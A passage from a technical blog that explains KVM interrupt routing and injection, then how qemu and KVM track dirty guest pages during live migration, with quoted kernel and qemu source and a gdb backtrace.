nr_rt_entries = max(nr_rt_entries, ue[i].gsi);
}
nr_rt_entries += 1;
new = kzalloc(sizeof(*new) + (nr_rt_entries * sizeof(struct hlist_head))
+ (nr * sizeof(struct kvm_kernel_irq_routing_entry)),
GFP_KERNEL);
if (!new)
return -ENOMEM;
new->rt_entries = (void *)&new->map[nr_rt_entries];
new->nr_rt_entries = nr_rt_entries;
for (i = 0; i < KVM_NR_IRQCHIPS; i++)
for (j = 0; j < KVM_IRQCHIP_NUM_PINS; j++)
new->chip[i][j] = -1;
for (i = 0; i < nr; ++i) {
r = -EINVAL;
if (ue->flags)
goto out;
r = setup_routing_entry(new, &new->rt_entries[i], ue);
if (r)
goto out;
++ue;
}
mutex_lock(&kvm->irq_lock);
old = kvm->irq_routing;
kvm_irq_routing_update(kvm, new);
mutex_unlock(&kvm->irq_lock);
synchronize_rcu();
new = old;
r = 0;
out:
kfree(new);
return r;
}
</code></pre></div></div>
<p>‘kvm_irq_routing_entry’ represents the irq routing entry. The default_routing is defined as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const struct kvm_irq_routing_entry default_routing[] = {
ROUTING_ENTRY2(0), ROUTING_ENTRY2(1),
ROUTING_ENTRY2(2), ROUTING_ENTRY2(3),
ROUTING_ENTRY2(4), ROUTING_ENTRY2(5),
ROUTING_ENTRY2(6), ROUTING_ENTRY2(7),
ROUTING_ENTRY2(8), ROUTING_ENTRY2(9),
ROUTING_ENTRY2(10), ROUTING_ENTRY2(11),
ROUTING_ENTRY2(12), ROUTING_ENTRY2(13),
ROUTING_ENTRY2(14), ROUTING_ENTRY2(15),
ROUTING_ENTRY1(16), ROUTING_ENTRY1(17),
ROUTING_ENTRY1(18), ROUTING_ENTRY1(19),
ROUTING_ENTRY1(20), ROUTING_ENTRY1(21),
ROUTING_ENTRY1(22), ROUTING_ENTRY1(23),
}
</code></pre></div></div>
<p>For the irq < 16, it has two entries, one for pic and one for ioapic. The ioapic entry is in the front.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define IOAPIC_ROUTING_ENTRY(irq) \
{ .gsi = irq, .type = KVM_IRQ_ROUTING_IRQCHIP, \
.u.irqchip.irqchip = KVM_IRQCHIP_IOAPIC, .u.irqchip.pin = (irq) }
#define ROUTING_ENTRY1(irq) IOAPIC_ROUTING_ENTRY(irq)
#ifdef CONFIG_X86
# define PIC_ROUTING_ENTRY(irq) \
{ .gsi = irq, .type = KVM_IRQ_ROUTING_IRQCHIP, \
.u.irqchip.irqchip = SELECT_PIC(irq), .u.irqchip.pin = (irq) % 8 }
# define ROUTING_ENTRY2(irq) \
IOAPIC_ROUTING_ENTRY(irq), PIC_ROUTING_ENTRY(irq)
Here irqchip is 0,1 for pic and 2 for ioapic.
Goto function 'kvm\_set\_irq\_routing', this functions allocates a 'kvm\_irq\_routing\_table'.
struct kvm_irq_routing_table {
int chip[KVM_NR_IRQCHIPS][KVM_IRQCHIP_NUM_PINS];
struct kvm_kernel_irq_routing_entry *rt_entries;
u32 nr_rt_entries;
/*
* Array indexed by gsi. Each entry contains list of irq chips
* the gsi is connected to.
*/
struct hlist_head map[0];
};
</code></pre></div></div>
<p>Here ‘KVM_NR_IRQCHIPS’ is 3, means two pic chips and one io-apic chip. ‘KVM_IRQCHIP_NUM_PINS’ is 24 means the ioapic has 24 pins. Every irq has one ‘kvm_kernel_irq_routing_entry’.</p>
<p>For every ‘kvm_irq_routing_entry’, it calls ‘setup_routing_entry’ to initialize the ‘kvm_kernel_irq_routing_entry’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int setup_routing_entry(struct kvm_irq_routing_table *rt,
struct kvm_kernel_irq_routing_entry *e,
const struct kvm_irq_routing_entry *ue)
{
int r = -EINVAL;
struct kvm_kernel_irq_routing_entry *ei;
/*
* Do not allow GSI to be mapped to the same irqchip more than once.
* Allow only one to one mapping between GSI and MSI.
*/
hlist_for_each_entry(ei, &rt->map[ue->gsi], link)
if (ei->type == KVM_IRQ_ROUTING_MSI ||
ue->type == KVM_IRQ_ROUTING_MSI ||
ue->u.irqchip.irqchip == ei->irqchip.irqchip)
return r;
e->gsi = ue->gsi;
e->type = ue->type;
r = kvm_set_routing_entry(rt, e, ue);
if (r)
goto out;
hlist_add_head(&e->link, &rt->map[e->gsi]);
r = 0;
out:
return r;
}
</code></pre></div></div>
<p>‘kvm_set_routing_entry’s work is to set the set callback function. For pic irq, sets the set to ‘kvm_set_pic_irq’, for ioapic irq, sets it to ‘kvm_set_ioapic_irq’. For the entry has the same gsi irq, it will linked by the field ‘link’ of ‘kvm_kernel_irq_routing_entry’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_set_routing_entry(struct kvm_irq_routing_table *rt,
struct kvm_kernel_irq_routing_entry *e,
const struct kvm_irq_routing_entry *ue)
{
int r = -EINVAL;
int delta;
unsigned max_pin;
switch (ue->type) {
case KVM_IRQ_ROUTING_IRQCHIP:
delta = 0;
switch (ue->u.irqchip.irqchip) {
case KVM_IRQCHIP_PIC_MASTER:
e->set = kvm_set_pic_irq;
max_pin = PIC_NUM_PINS;
break;
case KVM_IRQCHIP_PIC_SLAVE:
e->set = kvm_set_pic_irq;
max_pin = PIC_NUM_PINS;
delta = 8;
break;
case KVM_IRQCHIP_IOAPIC:
max_pin = KVM_IOAPIC_NUM_PINS;
e->set = kvm_set_ioapic_irq;
break;
default:
goto out;
}
...
}
r = 0;
out:
return r;
}
</code></pre></div></div>
<p>Following show the structure relation.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kvm
+-------------+
| |
| |
| |
+-------------+ +---------------------+
|irq_routing +---------> | chip |
+-------------+ +---------------------+
| | | rt_entries +----------+
| | +---------------------+ |
| | | nr_rt_entries | |
+-------------+ +---------------------+ |
| hlist_head ... | |
| | |
| | |
| | |
+---------------------+ <--------+
kvm_kernel_irq_routing_entry |
| |
+---------------------+
| |
| k^m_set_pic_irq |
+---------------------+
| |
| |
+---------------------+
| |
| |
+---------------------+
</code></pre></div></div>
<h4> Interrupt injection </h4>
<p>The devices generate interrupt by calling function ‘kvm_set_irq’ in kvm.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_set_irq(struct kvm *kvm, int irq_source_id, u32 irq, int level,
bool line_status)
{
struct kvm_kernel_irq_routing_entry *e, irq_set[KVM_NR_IRQCHIPS];
int ret = -1, i = 0;
struct kvm_irq_routing_table *irq_rt;
trace_kvm_set_irq(irq, level, irq_source_id);
/* Not possible to detect if the guest uses the PIC or the
* IOAPIC. So set the bit in both. The guest will ignore
* writes to the unused one.
*/
rcu_read_lock();
irq_rt = rcu_dereference(kvm->irq_routing);
if (irq < irq_rt->nr_rt_entries)
hlist_for_each_entry(e, &irq_rt->map[irq], link)
irq_set[i++] = *e;
rcu_read_unlock();
while(i--) {
int r;
r = irq_set[i].set(&irq_set[i], kvm, irq_source_id, level,
line_status);
if (r < 0)
continue;
ret = r + ((ret < 0) ? 0 : ret);
}
return ret;
}
</code></pre></div></div>
<p>First find all the ‘kvm_kernel_irq_routing_entry’ with the same irq and then call the set callback function. As we have seen, this can set can be ‘kvm_set_ioapic_irq’ or ‘kvm_set_pic_irq’. Let’s first talk about the pic situation.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int kvm_set_pic_irq(struct kvm_kernel_irq_routing_entry *e,
struct kvm *kvm, int irq_source_id, int level,
bool line_status)
{
#ifdef CONFIG_X86
struct kvm_pic *pic = pic_irqchip(kvm);
return kvm_pic_set_irq(pic, e->irqchip.pin, irq_source_id, level);
#else
return -1;
#endif
}
int kvm_pic_set_irq(struct kvm_pic *s, int irq, int irq_source_id, int level)
{
int ret, irq_level;
BUG_ON(irq < 0 || irq >= PIC_NUM_PINS);
pic_lock(s);
irq_level = __kvm_irq_line_state(&s->irq_states[irq],
irq_source_id, level);
ret = pic_set_irq1(&s->pics[irq >> 3], irq & 7, irq_level);
pic_update_irq(s);
trace_kvm_pic_set_irq(irq >> 3, irq & 7, s->pics[irq >> 3].elcr,
s->pics[irq >> 3].imr, ret == 0);
pic_unlock(s);
return ret;
}
</code></pre></div></div>
<p>The edge trigger need to call twice of ‘kvm_set_irq’. The first is to trigger the interrupt and the second is to prepare for next time.</p>
<p>In ‘pic_unlock’ it will kick off the vcpu and the cpu can have chance to handle the interrupt.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void pic_unlock(struct kvm_pic *s)
__releases(&s->lock)
{
bool wakeup = s->wakeup_needed;
struct kvm_vcpu *vcpu, *found = NULL;
int i;
s->wakeup_needed = false;
spin_unlock(&s->lock);
if (wakeup) {
kvm_for_each_vcpu(i, vcpu, s->kvm) {
if (kvm_apic_accept_pic_intr(vcpu)) {
found = vcpu;
break;
}
}
if (!found)
return;
kvm_make_request(KVM_REQ_EVENT, found);
kvm_vcpu_kick(found);
}
}
void kvm_vcpu_kick(struct kvm_vcpu *vcpu)
{
int me;
int cpu = vcpu->cpu;
wait_queue_head_t *wqp;
wqp = kvm_arch_vcpu_wq(vcpu);
if (waitqueue_active(wqp)) {
wake_up_interruptible(wqp);
++vcpu->stat.halt_wakeup;
}
me = get_cpu();
if (cpu != me && (unsigned)cpu < nr_cpu_ids && cpu_online(cpu))
if (kvm_arch_vcpu_should_kick(vcpu))
smp_send_reschedule(cpu);
put_cpu();
}
static void native_smp_send_reschedule(int cpu)
{
if (unlikely(cpu_is_offline(cpu))) {
WARN_ON(1);
return;
}
apic->send_IPI_mask(cpumask_of(cpu), RESCHEDULE_VECTOR);
}
</code></pre></div></div>
<p>Send an IPI interrupt to the CPU and later the CPU can process the interrupt.
Later in ‘vcpu_enter_guest’, it will call ‘inject_pending_event’. In ‘kvm_cpu_has_extint’, the PIC output has been set to 1, so it will call ‘kvm_queue_interrupt’ and ‘kvm_x86_ops->set_irq’. The latter callback is ‘vmx_inject_irq’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void vmx_inject_irq(struct kvm_vcpu *vcpu)
{
struct vcpu_vmx *vmx = to_vmx(vcpu);
uint32_t intr;
int irq = vcpu->arch.interrupt.nr;
trace_kvm_inj_virq(irq);
++vcpu->stat.irq_injections;
if (vmx->rmode.vm86_active) {
int inc_eip = 0;
if (vcpu->arch.interrupt.soft)
inc_eip = vcpu->arch.event_exit_inst_len;
if (kvm_inject_realmode_interrupt(vcpu, irq, inc_eip) != EMULATE_DONE)
kvm_make_request(KVM_REQ_TRIPLE_FAULT, vcpu);
return;
}
intr = irq | INTR_INFO_VALID_MASK;
if (vcpu->arch.interrupt.soft) {
intr |= INTR_TYPE_SOFT_INTR;
vmcs_write32(VM_ENTRY_INSTRUCTION_LEN,
vmx->vcpu.arch.event_exit_inst_len);
} else
intr |= INTR_TYPE_EXT_INTR;
vmcs_write32(VM_ENTRY_INTR_INFO_FIELD, intr);
}
</code></pre></div></div>
<p>Here we can see the interrupt has been written to the VMCS. Notice in ‘kvm_cpu_get_interrupt’, after the callchain ‘kvm_cpu_get_extint’->’kvm_pic_read_irq’->’pic_intack’. The last function sets the isr and clear the irr. This means the CPU is preparing to process the interrupt(anyway, the cpu will enter guest quickly).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static inline void pic_intack(struct kvm_kpic_state *s, int irq)
{
s->isr |= 1 << irq;
/*
* We don't clear a level sensitive interrupt here
*/
if (!(s->elcr & (1 << irq)))
s->irr &= ~(1 << irq);
if (s->auto_eoi) {
if (s->rotate_on_auto_eoi)
s->priority_add = (irq + 1) & 7;
pic_clear_isr(s, irq);
}
}
</code></pre></div></div>
<p>This is the story of PIC emulation. Now let’s see ‘kvm_set_ioapic_irq’. This function just calls ‘kvm_ioapic_set_irq’. After ‘ioapic_service’->’ioapic_deliver’->’kvm_irq_delivery_to_apic’, we finally delivery the interrupt to lapic. This function tries to find a vcpu to delivery to. Then call ‘kvm_apic_set_irq’ to set the lapic’s irq.</p>
<p>This is the story of interrupt (software) virtualization. As we can see, every interrupt needs VM-exit. This makes a heavy overhead of virtualization. Next time we will see how hardware asistant the interrupt virtualization.</p>
qemu/kvm dirty pages tracking in migration2018-08-11T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/08/11/dirty-pages-tracking-in-migration
<p>The live migration’s most work is to migrate the RAM of guest from src host to dest host.
So the qemu need to track the dirty pages of guest to transfer them to the dest host.
This article discusses how qemu do the tracking work.</p>
<p>In a summary, the following steps show the overview of dirty tracking:</p>
<ol>
<li>qemu allocs a bitmap and set its all bits to 1(mean dirty)</li>
<li>qemu calls kvm to set memory slots with ‘KVM_MEM_LOG_DIRTY_PAGES’ flags</li>
<li>qemu calls kvm to get the kvm dirty bitmap</li>
<li>qemu kvm wrapper: walk the dirty bitmap(from kvm) and fill the dirty bitmap(ram_list)</li>
<li>migration code: walk the ram_list dirty bitmap and set the qemu dirty page bitmap</li>
</ol>
<h3> qemu and kvm create bitmap </h3>
<p>In the ram migration setup function, it allocates the qemu bitmap in function ‘ram_save_init_globals’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
...
qemu_mutex_lock_iothread();
qemu_mutex_lock_ramlist();
rcu_read_lock();
bytes_transferred = 0;
reset_ram_globals();
ram_bitmap_pages = last_ram_offset() >> TARGET_PAGE_BITS;
migration_bitmap_rcu = g_new0(struct BitmapRcu, 1);
migration_bitmap_rcu->bmap = bitmap_new(ram_bitmap_pages);
bitmap_set(migration_bitmap_rcu->bmap, 0, ram_bitmap_pages);
...
/*
* Count the total number of pages used by ram blocks not including any
* gaps due to alignment or unplugs.
*/
migration_dirty_pages = ram_bytes_total() >> TARGET_PAGE_BITS;
memory_global_dirty_log_start();
migration_bitmap_sync();
qemu_mutex_unlock_ramlist();
qemu_mutex_unlock_iothread();
rcu_read_unlock();
return 0;
}
</code></pre></div></div>
<p>As we can see ‘migration_bitmap_rcu’ is the bitmap for qemu maintains.</p>
<p>Then it calls ‘memory_global_dirty_log_start’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void memory_global_dirty_log_start(void)
{
global_dirty_log = true;
MEMORY_LISTENER_CALL_GLOBAL(log_global_start, Forward);
/* Refresh DIRTY_LOG_MIGRATION bit. */
memory_region_transaction_begin();
memory_region_update_pending = true;
memory_region_transaction_commit();
}
</code></pre></div></div>
<p>This set ‘global_dirty_log’ to true and commit the memory change to kvm (for update).</p>
<p>It then calls ‘address_space_update_topology_pass’ and will call the ‘log_start’ for every MemoryRegionSection.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (adding) {
MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, region_nop);
if (frnew->dirty_log_mask & ~frold->dirty_log_mask) {
MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, log_start,
frold->dirty_log_mask,
frnew->dirty_log_mask);
}
</code></pre></div></div>
<p>For kvm it is ‘kvm_log_start’. We can see in ‘kvm_mem_flags’ it adds the ‘KVM_MEM_LOG_DIRTY_PAGES’ flags.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int kvm_mem_flags(MemoryRegion *mr)
{
bool readonly = mr->readonly || memory_region_is_romd(mr);
int flags = 0;
if (memory_region_get_dirty_log_mask(mr) != 0) {
flags |= KVM_MEM_LOG_DIRTY_PAGES;
}
if (readonly && kvm_readonly_mem_allowed) {
flags |= KVM_MEM_READONLY;
}
return flags;
}
</code></pre></div></div>
<p>Following stack backtrack shows the callchains.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) bt
#0 kvm_set_user_memory_region (kml=0x55ab8fc502c0, slot=0x55ab8fc50500) at /home/liqiang02/qemu0711/qemu-2.8/kvm-all.c:236
#1 0x000055ab8df10a92 in kvm_slot_update_flags (kml=0x55ab8fc502c0, mem=0x55ab8fc50500, mr=0x55ab8fd36f70)
at /home/liqiang02/qemu0711/qemu-2.8/kvm-all.c:376
#2 0x000055ab8df10b1f in kvm_section_update_flags (kml=0x55ab8fc502c0, section=0x7f0ab37fb4c0)
at /home/liqiang02/qemu0711/qemu-2.8/kvm-all.c:389
#3 0x000055ab8df10b65 in kvm_log_start (listener=0x55ab8fc502c0, section=0x7f0ab37fb4c0, old=0, new=4)
at /home/liqiang02/qemu0711/qemu-2.8/kvm-all.c:404
#4 0x000055ab8df18b33 in address_space_update_topology_pass (as=0x55ab8ea21880 <address_space_memory>, old_view=0x7f0cc4118ca0,
new_view=0x7f0aa804d380, adding=true) at /home/liqiang02/qemu0711/qemu-2.8/memory.c:854
#5 0x000055ab8df18d9b in address_space_update_topology (as=0x55ab8ea21880 <address_space_memory>)
at /home/liqiang02/qemu0711/qemu-2.8/memory.c:886
#6 0x000055ab8df18ed6 in memory_region_transaction_commit () at /home/liqiang02/qemu0711/qemu-2.8/memory.c:926
#7 0x000055ab8df1c9ef in memory_global_dirty_log_start () at /home/liqiang02/qemu0711/qemu-2.8/memory.c:2276
#8 0x000055ab8df30ce6 in ram_save_init_globals () at /home/liqiang02/qemu0711/qemu-2.8/migration/ram.c:1939
#9 0x000055ab8df30d36 in ram_save_setup (f=0x55ab90d874c0, opaque=0x0) at /home/liqiang02/qemu0711/qemu-2.8/migration/ram.c:1960
#10 0x000055ab8df3609a in qemu_savevm_state_begin (f=0x55ab90d874c0, params=0x55ab8ea0178c <current_migration+204>)
at /home/liqiang02/qemu0711/qemu-2.8/migration/savevm.c:956
#11 0x000055ab8e25d9b8 in migration_thread (opaque=0x55ab8ea016c0 <current_migration>) at migration/migration.c:1829
#12 0x00007f0cda1fd494 in start_thread () from /lib/x86_64-linux-gnu/libpthread.so.0
#13 0x00007f0cd9f3facf in clone () from /lib/x86_64-linux-gnu/libc.so.6
</code></pre></div></div>
<p>Here we know the memory topology doesn’t change but only adds the ‘KVM_MEM_LOG_DIRTY_PAGES’.</p>
<p>Now let’s go to the kvm part, as we can see the qemu sends ‘KVM_SET_USER_MEMORY_REGION’ ioctl
and the kernel will go to ‘__kvm_set_memory_region’</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __kvm_set_memory_region(struct kvm *kvm,
const struct kvm_userspace_memory_region *mem)
{
if (npages) {
if (!old.npages)
change = KVM_MR_CREATE;
else { /* Modify an existing slot. */
if ((mem->userspace_addr != old.userspace_addr) ||
(npages != old.npages) ||
((new.flags ^ old.flags) & KVM_MEM_READONLY))
goto out;
if (base_gfn != old.base_gfn)
change = KVM_MR_MOVE;
else if (new.flags != old.flags)
change = KVM_MR_FLAGS_ONLY;
else { /* Nothing to change. */
r = 0;
goto out;
}
}
...
/* Allocate page dirty bitmap if needed */
if ((new.flags & KVM_MEM_LOG_DIRTY_PAGES) && !new.dirty_bitmap) {
if (kvm_create_dirty_bitmap(&new) < 0)
goto out_free;
}
...
}
</code></pre></div></div>
<p>The most important work here is to call ‘kvm_create_dirty_bitmap’ to allocate a bitmap.
for every memslot it will allocate memslot->dirty_bitmap in this function.
/*
* Allocation size is twice as large as the actual dirty bitmap size.
* See x86’s kvm_vm_ioctl_get_dirty_log() why this is needed.
*/
static int kvm_create_dirty_bitmap(struct kvm_memory_slot *memslot)
{
unsigned long dirty_bytes = 2 * kvm_dirty_bitmap_bytes(memslot);</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> memslot->dirty_bitmap = kvm_kvzalloc(dirty_bytes);
if (!memslot->dirty_bitmap)
return -ENOMEM;
return 0;
}
</code></pre></div></div>
<p>Then goes to ‘kvm_arch_commit_memory_region’ and ‘kvm_mmu_slot_remove_write_access’.
Notice, this is not the newest implementation but an old kernel (3.13).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void kvm_mmu_slot_remove_write_access(struct kvm *kvm, int slot)
{
struct kvm_memory_slot *memslot;
gfn_t last_gfn;
int i;
memslot = id_to_memslot(kvm->memslots, slot);
last_gfn = memslot->base_gfn + memslot->npages - 1;
spin_lock(&kvm->mmu_lock);
for (i = PT_PAGE_TABLE_LEVEL;
i < PT_PAGE_TABLE_LEVEL + KVM_NR_PAGE_SIZES; ++i) {
unsigned long *rmapp;
unsigned long last_index, index;
rmapp = memslot->arch.rmap[i - PT_PAGE_TABLE_LEVEL];
last_index = gfn_to_index(last_gfn, memslot->base_gfn, i);
for (index = 0; index <= last_index; ++index, ++rmapp) {
if (*rmapp)
__rmap_write_protect(kvm, rmapp, false);
if (need_resched() || spin_needbreak(&kvm->mmu_lock)) {
kvm_flush_remote_tlbs(kvm);
cond_resched_lock(&kvm->mmu_lock);
}
}
}
kvm_flush_remote_tlbs(kvm);
spin_unlock(&kvm->mmu_lock);
}
</code></pre></div></div>
<p>As the function name implies, it remove write access of this memory slot.</p>
<p>Here we just focus the normal 4k page, not 2M and 1G page. The ‘memslot->arch.rmp’ is a gfn->spte map, say given a gfn we can find the correspoding spte.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static bool __rmap_write_protect(struct kvm *kvm, unsigned long *rmapp,
bool pt_protect)
{
u64 *sptep;
struct rmap_iterator iter;
bool flush = false;
for (sptep = rmap_get_first(*rmapp, &iter); sptep;) {
BUG_ON(!(*sptep & PT_PRESENT_MASK));
if (spte_write_protect(kvm, sptep, &flush, pt_protect)) {
sptep = rmap_get_first(*rmapp, &iter);
continue;
}
sptep = rmap_get_next(&iter);
}
return flush;
}
static bool
spte_write_protect(struct kvm *kvm, u64 *sptep, bool *flush, bool pt_protect)
{
u64 spte = *sptep;
if (!is_writable_pte(spte) &&
!(pt_protect && spte_is_locklessly_modifiable(spte)))
return false;
rmap_printk("rmap_write_protect: spte %p %llx\n", sptep, *sptep);
if (__drop_large_spte(kvm, sptep)) {
*flush |= true;
return true;
}
if (pt_protect)
spte &= ~SPTE_MMU_WRITEABLE;
spte = spte & ~PT_WRITABLE_MASK;
*flush |= mmu_spte_update(sptep, spte);
return false;
}
</code></pre></div></div>
<p>So here for every gfn, we remove the write access. After return from this ioctl, the guest’s RAM
has been marked no write access, every write to this will exit to KVM make the page dirty. This means ‘start the dirty log’.</p>
<p>When the guest write the memory, it will trigger the ept violation vmexit. Then calls ‘tdp_page_fault’.
Because this is caused by write protection, the CPU will set the error code to ‘PFERR_WRITE_MASK’ so the ‘fast_page_fault’
and ‘fast_pf_fix_direct_spte’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static bool
fast_pf_fix_direct_spte(struct kvm_vcpu *vcpu, u64 *sptep, u64 spte)
{
struct kvm_mmu_page *sp = page_header(__pa(sptep));
gfn_t gfn;
WARN_ON(!sp->role.direct);
/*
* The gfn of direct spte is stable since it is calculated
* by sp->gfn.
*/
gfn = kvm_mmu_page_get_gfn(sp, sptep - sp->spt);
if (cmpxchg64(sptep, spte, spte | PT_WRITABLE_MASK) == spte)
mark_page_dirty(vcpu->kvm, gfn);
return true;
}
void mark_page_dirty(struct kvm *kvm, gfn_t gfn)
{
struct kvm_memory_slot *memslot;
memslot = gfn_to_memslot(kvm, gfn);
mark_page_dirty_in_slot(kvm, memslot, gfn);
}
void mark_page_dirty_in_slot(struct kvm *kvm, struct kvm_memory_slot *memslot,
gfn_t gfn)
{
if (memslot && memslot->dirty_bitmap) {
unsigned long rel_gfn = gfn - memslot->base_gfn;
set_bit_le(rel_gfn, memslot->dirty_bitmap);
}
}
</code></pre></div></div>
<p>Here we can see, it will set the spte writeable again and set the dirty bitmap.</p>
<h3> qemu sync dirty log with kvm </h3>
<p>Let’s go back to ‘ram_\save_init_globals’ after telling the kvm to begin start dirty log, it calls ‘migration_bitmap_sync’.
This function calls ‘memory_global_dirty_log_sync’ to get the dirty map from kvm. ‘kvm_log_sync’ is used to do this.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void kvm_log_sync(MemoryListener *listener,
MemoryRegionSection *section)
{
KVMMemoryListener *kml = container_of(listener, KVMMemoryListener, listener);
int r;
r = kvm_physical_sync_dirty_bitmap(kml, section);
if (r < 0) {
abort();
}
}
static int kvm_physical_sync_dirty_bitmap(KVMMemoryListener *kml,
MemoryRegionSection *section)
{
KVMState *s = kvm_state;
unsigned long size, allocated_size = 0;
struct kvm_dirty_log d = {};
KVMSlot *mem;
int ret = 0;
hwaddr start_addr = section->offset_within_address_space;
hwaddr end_addr = start_addr + int128_get64(section->size);
d.dirty_bitmap = NULL;
while (start_addr < end_addr) {
mem = kvm_lookup_overlapping_slot(kml, start_addr, end_addr);
if (mem == NULL) {
break;
}
...
size = ALIGN(((mem->memory_size) >> TARGET_PAGE_BITS),
/*HOST_LONG_BITS*/ 64) / 8;
if (!d.dirty_bitmap) {
d.dirty_bitmap = g_malloc(size);
} else if (size > allocated_size) {
d.dirty_bitmap = g_realloc(d.dirty_bitmap, size);
}
allocated_size = size;
memset(d.dirty_bitmap, 0, allocated_size);
d.slot = mem->slot | (kml->as_id << 16);
if (kvm_vm_ioctl(s, KVM_GET_DIRTY_LOG, &d) == -1) {
DPRINTF("ioctl failed %d\n", errno);
ret = -1;
break;
}
kvm_get_dirty_pages_log_range(section, d.dirty_bitmap);
start_addr = mem->start_addr + mem->memory_size;
}
g_free(d.dirty_bitmap);
return ret;
}
</code></pre></div></div>
<p>Here we can see the qemu sends out a ‘KVM_GET_DIRTY_LOG’ ioctl. In kvm</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_vm_ioctl_get_dirty_log(struct kvm *kvm, struct kvm_dirty_log *log)
{
int r;
struct kvm_memory_slot *memslot;
unsigned long n, i;
unsigned long *dirty_bitmap;
unsigned long *dirty_bitmap_buffer;
bool is_dirty = false;
mutex_lock(&kvm->slots_lock);
r = -EINVAL;
if (log->slot >= KVM_USER_MEM_SLOTS)
goto out;
memslot = id_to_memslot(kvm->memslots, log->slot);
dirty_bitmap = memslot->dirty_bitmap;
r = -ENOENT;
if (!dirty_bitmap)
goto out;
n = kvm_dirty_bitmap_bytes(memslot);
dirty_bitmap_buffer = dirty_bitmap + n / sizeof(long);
memset(dirty_bitmap_buffer, 0, n);
spin_lock(&kvm->mmu_lock);
for (i = 0; i < n / sizeof(long); i++) {
unsigned long mask;
gfn_t offset;
if (!dirty_bitmap[i])
continue;
is_dirty = true;
mask = xchg(&dirty_bitmap[i], 0);
dirty_bitmap_buffer[i] = mask;
offset = i * BITS_PER_LONG;
kvm_mmu_write_protect_pt_masked(kvm, memslot, offset, mask);
}
if (is_dirty)
kvm_flush_remote_tlbs(kvm);
spin_unlock(&kvm->mmu_lock);
r = -EFAULT;
if (copy_to_user(log->dirty_bitmap, dirty_bitmap_buffer, n))
goto out;
r = 0;
out:
mutex_unlock(&kvm->slots_lock);
return r;
}
</code></pre></div></div>
<p>It copys the dirty bitmap to userspace and also set the spte to write protection using ‘kvm_mmu_write_protect_pt_masked’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void kvm_mmu_write_protect_pt_masked(struct kvm *kvm,
struct kvm_memory_slot *slot,
gfn_t gfn_offset, unsigned long mask)
{
unsigned long *rmapp;
while (mask) {
rmapp = __gfn_to_rmap(slot->base_gfn + gfn_offset + __ffs(mask),
PT_PAGE_TABLE_LEVEL, slot);
__rmap_write_protect(kvm, rmapp, false);
/* clear the first set bit */
mask &= mask - 1;
}
}
</code></pre></div></div>
<p>So next time, the guest write to this pfn page, it will mark as a dirty page again.</p>
<p>kvm_get_dirty_pages_log_range–>cpu_physical_memory_set_dirty_lebitmap.</p>
<p>In the later function, it sets ‘ram_list.dirty_memory[i])->blocks’ dirty bitmap.
This dirty bitmap lays in ‘ram_list’, not with the migration.</p>
<h3> qemu copy dirty bitmap to migration bitmap </h3>
<p>In ‘migration_bitmap_sync’ after the call of ‘memory_global_dirty_log_sync’,
‘migration_bitmap_sync_range’ will be called for every block. This calls copy ‘ram_list’s
dirty bitmap to ‘migration_bitmap_rcu->bmap’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void migration_bitmap_sync_range(ram_addr_t start, ram_addr_t length)
{
unsigned long *bitmap;
bitmap = atomic_rcu_read(&migration_bitmap_rcu)->bmap;
migration_dirty_pages +=
cpu_physical_memory_sync_dirty_bitmap(bitmap, start, length);
}
static inline
uint64_t cpu_physical_memory_sync_dirty_bitmap(unsigned long *dest,
ram_addr_t start,
ram_addr_t length)
{
ram_addr_t addr;
unsigned long page = BIT_WORD(start >> TARGET_PAGE_BITS);
uint64_t num_dirty = 0;
/* start address is aligned at the start of a word? */
if (((page * BITS_PER_LONG) << TARGET_PAGE_BITS) == start) {
...
src = atomic_rcu_read(
&ram_list.dirty_memory[DIRTY_MEMORY_MIGRATION])->blocks;
for (k = page; k < page + nr; k++) {
if (src[idx][offset]) {
unsigned long bits = atomic_xchg(&src[idx][offset], 0);
unsigned long new_dirty;
new_dirty = ~dest[k];
dest[k] |= bits;
new_dirty &= bits;
num_dirty += ctpopl(new_dirty);
}
...
return num_dirty;
}
</code></pre></div></div>
<p>Now, the ‘migration_bitmap_rcu->bmap’ know all the dirty pages. Of course it is not very useful for
the setup process, as qemu already set all of ‘migration_bitmap_rcu->bmap’ to 1.</p>
<h3> find the dirty pages and send out </h3>
<p>After the setup, we go to the most important process, iterate send pages to the dest and after a water mark
reached, stop the machine and send the other all dirty pages to dest. The overview can short as following.</p>
